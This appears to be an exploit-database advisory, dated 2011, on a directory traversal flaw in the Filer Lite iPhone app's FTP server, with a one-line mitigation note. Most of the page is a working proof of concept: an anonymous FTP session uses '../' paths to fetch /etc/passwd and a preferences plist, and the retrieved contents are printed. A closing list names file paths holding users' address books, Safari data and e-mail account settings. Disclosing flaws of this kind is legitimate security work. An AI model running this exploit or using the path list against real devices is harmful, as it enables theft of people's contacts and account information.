Filer Lite v2.1.0 for iPhone / iPod touch, Directory Traversal

vendor:

Filer Lite

by:

R3d@l3rt, Sp@2K, Sunlight, H@ckk3y

3.3

CVSS

MEDIUM

Directory Traversal

CWE

Product Name: Filer Lite

Affected Version From: 2.1.2000

Affected Version To: 2.1.2000

Patch Exists: NO

Related CWE: N/A

CPE: a:filer_lite:filer_lite:2.1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: iPhone, iPod 3GS with 4.2.1 firmware

2011

Filer Lite v2.1.0 for iPhone / iPod touch, Directory Traversal

There is directory traversal vulnerability in the Filer Lite. Exploit Testing involves using FTP to connect to the server and using the 'get' command to traverse directories and access sensitive files such as /etc/passwd and /private/var/mobile/Library/Preferences/com.apple.conference.plist.

Mitigation:

Ensure that user input is validated and sanitized before being used in file and directory operations.

Source

Exploit-DB raw data:

# Exploit Title: Filer Lite v2.1.0 for iPhone / iPod touch, Directory Traversal 
# Date: 02/24/2011
# Author: R3d@l3rt, Sp@2K, Sunlight, H@ckk3y
# Software Link : http://itunes.apple.com/kr/app/filer-lite-download-view-manage/id350939597?mt=8
# Version: 2.1.0
# Tested on: iPhone, iPod 3GS with 4.2.1 firmware  

# There is directory traversal vulnerability in the Filer Lite.  
# Exploit Testing

C:\>ftp
ftp> open 192.168.0.70 2121
Connected to 192.168.0.70.
220 DiddyFTP server ready.
User (192.168.0.70:(none)): anonymous
331 Password required for anonymous
Password:
230 User anonymous logged in.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for '/bin/ls'.
total 1
drwxr-xr-x     2 mobile mobile        136 Feb 24 15:42 Filer Help Files
226 Transfer complete.
ftp: 81 bytes received in 0.00Seconds 81000.00Kbytes/sec.
ftp> get ../../../../../etc/passwd
200 PORT command successful.
150 Opening BINARY mode data connection for '../../../../../etc/passwd'.
226 Transfer complete.
ftp: 785 bytes received in 0.00Seconds 785000.00Kbytes/sec.
ftp> get ../../../../../../private/var/mobile/Library/Preferences/com.apple.conference.plist
200 PORT command successful.
150 Opening BINARY mode data connection for '../../../../../../private/var/mobile/Library/Preferences/com.apple.conference.plist'.
226 Transfer complete.
ftp: 270 bytes received in 0.00Seconds 270000.00Kbytes/sec.
ftp> quit

C:\>type passwd
#
# 4.3BSD-compatable User Database
#
# Note that this file is not consulted for login.
# It only exisits for compatability with 4.3BSD utilities.
#
# This file is automatically re-written by various system utilities.
# Do not edit this file.  Changes will be lost.
#
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
mobile:*:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false

C:\>type com.apple.conference.plist
bplist00?_restoredFromBackup\natTypeCache?
_DIPv4.Router=192.168.0.1;IPv4.RouterHardwareAddress=1c:bd:b9:XX:XX:XX_EIPv4.R
outer=192.168.11.1;IPv4.RouterHardwareAddress=00:24:a5:XX:XX:XX?  XnatFlag
C:\>



# IPhone inside information

1. Phone Book
 - /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb
     
2. Safari Favorites List
 - /private/var/mobile/Library/Safari

3. Users E-mail Information
 - /private/var/mobile/Library/Preferences/com.apple.accountsettings.plist

4. IPv4 Router Information
 - /private/var/mobile/Library/Preferences/com.apple.conference.plist